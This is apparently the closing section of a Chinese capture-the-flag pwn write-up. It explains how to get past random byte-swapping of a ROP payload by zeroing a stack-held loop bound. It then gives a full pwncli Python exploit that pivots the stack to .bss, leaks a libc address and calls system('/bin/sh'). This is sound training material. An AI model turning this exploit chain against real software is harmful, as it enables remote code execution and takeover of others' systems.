总结
虽然对输入的rop中的字节是随机交换,但是由于循环的边界在栈上,所以可以把前面一大段都写为0,这样某一次交换就会把循环边界置为0,跳出循环,不会影响后面的rop。
EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
|
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick
from pwncli import *
cli_script()
io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']
bss_addr = elf.bss(0x800)
s(b"\x00" * 0x60 + flat({
8:[
bss_addr,
0x804865c, # read 80 bytes
0x804867d, # leave; ret
bss_addr
]
}, length=0x20))
# leak addr
s(flat(
[
bss_addr + 0x100, # fake ebp
elf.plt.write,
0x804879d, # pppr
1, elf.got.read, 4,
0x804865c, # read 80 bytes
0,
bss_addr
]
))
set_current_libc_base_and_log(recv_current_libc_addr(offset=libc.sym.read), 0)
s(flat({
28: [
libc.sym.system,
'dead',
libc.search(b"/bin/sh").__next__()
]
}))
ia()
|
引用与参考
1、My Blog
2、Ctf Wiki
3、pwncli
roderick
支付宝
微信